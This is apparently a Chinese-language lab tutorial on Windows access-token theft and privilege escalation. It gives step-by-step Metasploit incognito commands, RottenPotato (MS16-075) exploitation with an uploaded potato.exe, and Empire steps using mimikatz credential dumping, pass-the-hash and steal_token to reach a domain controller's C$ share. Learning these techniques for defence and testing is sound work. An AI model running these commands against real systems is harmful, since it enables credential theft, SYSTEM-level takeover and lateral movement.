简介

不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。
这里有两种类型的令牌:
(1)授权令牌(Delegation Tokens),它支持交互式登录,例如远程桌面,用户桌面访问。
(2)模拟令牌(Impersonation Tokens),它支持非交互式的会话,例如访问目标共享文件。
两种令牌会在系统重启后才会清除;授权令牌在用户注销后,该令牌会变为模拟令牌会依旧有效。
列举令牌只能列出当前用户和比当前用户权限更低用户的令牌,例如当前权限是system或者是administrator,那么我们就可以看到系统中所有的令牌。

目录

MSF令牌窃取

实验环境

kali攻击机,windows2008域成员靶机

use incognito 使用令牌窃取功能

list_tokens -u 列出当前令牌

获取win2008会话并列出当前令牌

impersonate_token 'NT AUTHORITY\SYSTEM' 切换令牌

rev2self 返回初始身份

使用msf进行令牌窃取,切换

烂土豆本地提权(RottenPotato)

简介

当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正Windows服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。

攻击流程

欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到控制的TCP终端
对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程通过一系列的Windows API调用实现的。
模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数服务型账户(IIS、MSSQL等)都有这个权限,用户级账户大多数没有这个权限。

实验环境

kali攻击机,windows2012靶机

获取win2012会话

检查系统漏洞模块
use multi/recon/local_exploit_suggester

拿到一个具有此漏洞主机的会话

上传漏洞利用工具

下载地址:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

上传利用工具

use incognito
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
getuid

成功提权

Empire下的令牌窃取

实验环境

kali攻击机,windows2012域控,windows2008域成员

获取win2008本地管理员会话

使用 mimikatz 获取系统密码

creds 查看empire列举的密码

pth 1 窃取目标身份

steal_token 1348 窃取身份令牌

在windows2012机器c盘下添加文件

shell dir \192.168.31.12\c$ 列出2012 C盘文件